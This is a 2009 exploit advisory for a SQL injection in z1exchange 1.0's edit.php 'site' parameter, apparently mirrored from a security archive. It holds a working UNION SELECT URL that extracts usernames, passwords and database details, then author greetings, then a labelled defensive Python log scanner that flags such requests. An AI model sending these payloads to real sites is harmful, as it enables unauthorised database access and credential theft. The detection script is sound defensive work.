z1exchange 1.0 (edit.php site) Remote SQL Injection Vulnerability

2009.02.28
Credit: jiko
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-------------------------------------------------------------------------
-- JIKO FroM No-exploit.Com ---
-------------------------------------------------------------------------
# Author : jiko
# email : jalikom@hotmail.com
# Home : www.no-exploit.Com
# Script : z1exchange-->http://1scripts.net/scripts/z1exchange.zip

Proud To Be MoroCCaN -->> WwW.No-ExploiT.CoM , WwW.Exploiter5.CoM
Fkhatar L3chran wwlad darb wlidat l9issm wmansach L3chira

=========================[JAWAD Cha7ta 4 ever]===================

# Exploit :
http://no-exploit.com
http://no-exploit.com//z1exchange/edit.php?site=[sql]
http://no-exploit.com//z1exchange/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users--

DEMO:
http://localhost/scripts/z1exchange/z1exchange/edit.php?site=-12 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

=========================[Thanks To Allah ]===================

greetz : all my friend and all No-exploit members and $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ leopard all muslims
visit: www.no-exploit.Com
Visit: My-montada.Co.cc For your free Forum

-------------------------------------------------------------------------
-- JIKO FroM No-exploit.Com ---
-------------------------------------------------------------------------
------== troops of Mohamed comming inchalah =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc Raha nayda Nood :)Fuck Bigg Kbir Lkarcha Bo ta7cha stoon dyalibou7do hwa cha7ta
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
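
A defender-side check for the request pattern shown in the advisory, as an added example that is not part of the original advisory or of z1exchange: it scans web access logs for edit.php requests whose site parameter is not a plain integer. The log lines are constructed, and the rule that legitimate site values are numeric ids is an assumption inferred from the PoC, not confirmed from the z1exchange source.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation-range IPs).
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Feb/2009:10:01:02 +0000] "GET /z1exchange/edit.php?site=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Feb/2009:10:03:41 +0000] "GET /z1exchange/edit.php?site=-12%20union%20select%200,1,2-- HTTP/1.1" 200 6200',
    '203.0.113.9 - - [28/Feb/2009:10:04:10 +0000] "GET /z1exchange/edit.php?site=-12+union+select+0,1,2++from+users-- HTTP/1.1" 200 6200',
    '203.0.113.9 - - [28/Feb/2009:10:04:55 +0000] "GET /z1exchange/edit.php?site=abc HTTP/1.1" 200 900',
    '198.51.100.7 - - [28/Feb/2009:10:05:00 +0000] "GET /z1exchange/index.php?site=-1 HTTP/1.1" 200 900',
]

# client ip, request target and status from a combined-format log line
REQUEST = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})'
)
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def suspicious_edit_requests(lines):
    """Return (ip, status, reason, decoded_value) for each edit.php request
    whose 'site' parameter is not a plain non-negative integer."""
    findings = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue  # not a parseable request line
        ip, target, status = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/edit.php"):
            continue  # the advisory only concerns edit.php
        # parse_qs percent-decodes values and turns '+' into a space
        for value in parse_qs(url.query, keep_blank_values=True).get("site", []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # assumed legitimate form: numeric id
            reason = "union-select" if UNION_SELECT.search(value) else "non-numeric"
            findings.append((ip, int(status), reason, value))
    return findings


if __name__ == "__main__":
    for finding in suspicious_edit_requests(SAMPLE_LOG):
        print(finding)
```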


Copyright 2024, cxsecurity.com

 
